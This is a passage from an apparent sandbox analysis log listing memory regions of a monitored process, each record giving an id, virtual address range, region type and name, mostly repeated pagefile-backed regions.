"pagefile_0x00000000064e0000" filename = "" Region: id = 3560 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3561 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3562 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3563 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3564 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3565 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3566 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3567 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3568 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3569 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3570 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3571 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3572 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3573 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3574 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3575 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3576 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3577 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3578 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3579 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3580 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3581 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3582 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3583 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3584 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3585 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3586 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3587 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3588 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3589 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3590 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3591 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3592 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3593 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3594 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3595 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3596 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3597 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3598 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3599 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3600 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3601 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3602 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3603 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3604 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3605 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3606 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3607 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3608 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3609 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3610 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3611 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3612 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3613 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3614 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3615 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3616 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3617 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3618 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3619 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3620 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3621 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3622 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3623 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3624 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3625 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3626 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3627 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3628 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3629 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3630 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3631 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3632 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3633 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3634 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3635 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3636 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3637 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3638 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3639 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3640 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3641 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3642 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3643 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3644 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3645 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3646 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3647 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3648 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3649 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3650 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3651 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3652 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3653 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3654 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3655 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3656 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3657 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3658 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3659 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3660 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3661 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3662 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3663 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3664 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3665 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3666 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3667 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3668 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3669 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3670 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3671 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3672 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3673 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3674 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3675 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3676 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3677 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3678 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3679 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3680 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3681 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3682 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3683 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3684 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3685 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3686 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3687 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3688 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3689 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3690 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3691 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3692 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3693 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3694 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3695 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3696 start_va = 0x64e0000 end_va = 0x64e4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3697 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3698 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3699 start_va = 0x64e0000 end_va = 0x64f6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3700 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3701 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3702 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3703 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3704 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3705 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3706 start_va = 0x64e0000 end_va = 0x64f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3707 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3708 start_va = 0x64e0000 end_va = 0x64effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 3709 start_va = 0x64e0000 end_va = 0x64fbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000064e0000" filename = "" Region: id = 3710 start_va = 0x6500000 end_va = 0x650dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006500000" filename = "" Region: id = 3711 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3712 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3713 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3714 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3715 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3716 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3717 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3718 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3719 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3720 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3721 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3722 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3723 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3724 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3725 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3726 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3727 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3728 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3729 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3730 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3731 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3732 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3733 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3734 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3735 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3736 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000064e0000" filename = "" Region: id = 3737 start_va = 0x72a0000 end_va = 0x7a9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000072a0000" filename = "" Region: id = 3738 start_va = 0x64e0000 end_va = 0x64edfff monitored = 1 entry_point = 0x0 